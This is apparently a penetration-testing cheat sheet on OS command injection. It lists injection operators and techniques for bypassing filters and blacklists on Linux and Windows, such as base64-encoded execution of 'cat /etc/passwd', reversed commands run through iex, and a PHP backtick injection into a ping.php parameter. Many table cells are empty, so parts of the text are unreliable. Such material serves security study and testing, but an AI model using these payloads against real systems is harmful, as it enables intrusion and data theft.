OS Command Injection


  • Injection vulnerabilities are considered the number 3 risk in OWASP's Top 10 Web App Risks, given their high impact and how common they are.

  • Injection occurs when user-controlled input is misinterpreted as part of the web query or code being executed, which may lead to subverting the intended outcome of the query to a different outcome that is useful to the attacker.

  • When it comes to OS Command Injections, the user input we control must directly or indirectly go into (or somehow affect) a web query that executes system commands.

OS Command Injection Tools

Injection Operators

Injection Operator
Injection Character
URL-Encoded Character
Executed Command





New Line






Both (second output generally shown first)




Both (only second output is shown)




Both (only if first succeeds)




Second (only if first fails)




Both (Linux-only)




Both (Linux-only)

Linux Filtered Character Bypass

Filtered Character
Bypass Method

printenv command


Can be used to view all environment variables

Space Character


Using tabs instead of spaces

Space Character


Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

Space Character


Commas will be replaced with spaces

/ Character


Will be replaced with /

; Character


Will be replaced with ;

Any Character

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> )

Windows Filtered Character Bypass

Filtered Character
Bypass Method

Env command

Get-ChildItem Env

Can be used to view all environment variables - (PowerShell)

Space Character


Using tabs instead of spaces

Space Character


Will be replaced with a space - (CMD)

Space Character


Will be replaced with a space - (PowerShell)

\ Character


Will be replaced with \ - (CMD)

\ Character


Will be replaced with \ - (PowerShell)

Linux Blacklisted Command Bypass

Blacklist Bypass

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

Case Manipulation

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

Reversing a Command

echo 'whoami' | rev

Reverse a string

Reversing a Command


Execute reversed command

Base64 Encoding Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Encode a string with base64

Base64 Encoding Commands

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

Windows Blacklisted Command Bypass

Blacklist Bypass

Case Manipulation


Reversing a Commands

"whoami"[-1..-20] -join ''

Reversing a Commands

iex "$('imaohw'[-1..-20] -join '')"

Base64 Encoding Commands


Base64 Encoding Commands

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64OUT')))"

Miscellaneous & Tricks

This section contains tricks for specific languages and web frameworks

PHP backtick character

The backtick character (`) in PHP can be used to gain OS command injection, as it is a character used for shell commands execution, similarly to shell_exec()function.

When you enclose a string in backticks, PHP will execute it as a shell command and return the output.

Consider the following example scenario:

  1. You are dealing with a web application written in PHP where a ping.php page is hosted.

  2. Navigating to http://example.com/ping.php?ip= allows users to ping the ip address specified (

  3. If any standard way to perform OS command execution does not work, you could use the backticks to your advantage. For example, you could navigate to: http://example.com/ping.php?ip=;`ls` to effectively run the ls command after the ping

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